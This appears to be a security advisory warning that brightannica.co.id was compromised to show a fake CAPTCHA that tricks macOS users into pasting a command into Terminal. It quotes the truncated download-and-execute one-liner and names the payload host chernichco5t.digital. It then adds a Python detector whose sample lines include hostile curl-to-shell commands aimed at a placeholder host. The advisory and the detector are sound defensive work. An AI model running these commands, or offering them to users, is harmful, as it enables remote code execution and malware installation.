Community Intel & Discussions
🚨 High-Risk Malware Distribution: Fake CAPTCHA
Risk Category: Confirmed Malware Delivery / Social Engineering
URLert.com has classified brightannica.co.id as a high-risk domain. While the site appears to belong to a legitimate education and migration agency, it has been compromised to serve as a delivery vector for sophisticated malware targeting macOS and potentially other operating systems.
The domain is currently hosting a malicious "Verification" overlay designed to trick users into compromising their own systems through a fake CAPTCHA mechanism.
Specific Findings & Evidence:
- Social Engineering Attack: The website displays a fraudulent "Verification Steps" pop-up. It instructs users to open their system Terminal, paste a command (Command + V), and press Enter to "prove they are not a robot."
- Malicious Payload: Admin observations confirm that the clipboard content contains a lethal one-liner command:
/bin/bash -c "$(curl -fsSL ...)". This command downloads and executes a remote script from an external, untrusted domain (chernichco5t.digital).
- System Compromise: This technique bypasses browser security sandboxes by convincing the user to execute code directly on their operating system. This typically results in the installation of info-stealers, backdoors, or ransomware.
- Compromised Infrastructure: It is highly likely that the legitimate Brightannica corporate site has been injected with malicious scripts by a third party.
IMMEDIATE ACTION REQUIRED: Do not follow any instructions on this website to open your Terminal or Command Prompt. If you have already executed the requested commands, consider your system fully compromised. Disconnect from the internet immediately, back up essential files, and perform a clean OS reinstallation. Avoid entering any passwords or financial information on the affected device.
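
A defender-side check for the command shape reported above, as an added example that is not part of the original advisory: it flags clipboard text or shell-history lines that run downloaded content through a shell, and also covers the related pipe-to-shell form as a generalization. The function names, regexes and sample lines are constructed for illustration, and payload.example.invalid is a placeholder host.

```python
import re
from urllib.parse import urlsplit

SHELL = r"(?:ba|z|da|k)?sh"
# Shell run with -c on a command substitution that fetches remote content,
# the shape reported on this page: /bin/bash -c "$(curl -fsSL ...)"
SUBST_EXEC = re.compile(
    r"\b" + SHELL + r"\s+-c\s+[\"']?\s*(?:\$\(|`)\s*(?:curl|wget)\b", re.I)
# Related shape (generalization beyond the page): download piped into a shell.
PIPE_EXEC = re.compile(
    r"\b(?:curl|wget)\b[^|;&\n]*\|\s*(?:sudo\s+)?(?:\S*/)?" + SHELL + r"\b", re.I)
URL = re.compile(r"https?://[^\s\"'`)|]+", re.I)


def inspect(text):
    """Return {'pattern', 'hosts'} if text is download-and-execute, else None."""
    for name, rx in (("shell -c substitution", SUBST_EXEC),
                     ("pipe to shell", PIPE_EXEC)):
        if rx.search(text):
            hosts = {urlsplit(u).hostname for u in URL.findall(text)}
            return {"pattern": name, "hosts": sorted(h for h in hosts if h)}
    return None


def scan(lines):
    """Return [(line_number, finding)] for every flagged line (1-based)."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := inspect(line))]


# Constructed sample input (not captured data); the host is a placeholder.
SAMPLE = [
    'ls -la ~/Downloads',
    '/bin/bash -c "$(curl -fsSL https://payload.example.invalid/v)"',
    'curl -fsSL https://example.org/file.tar.gz -o file.tar.gz',
    'curl -s https://payload.example.invalid/x.sh | sh',
    'curl -s https://example.org/file.tar.gz | shasum -a 256',
    'bash -c "echo hello"',
]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE):
        print(n, finding["pattern"], finding["hosts"])
```

A match is a triage signal rather than a verdict, since some legitimate installers use the same command shape; the extracted host is what to check against reputation data.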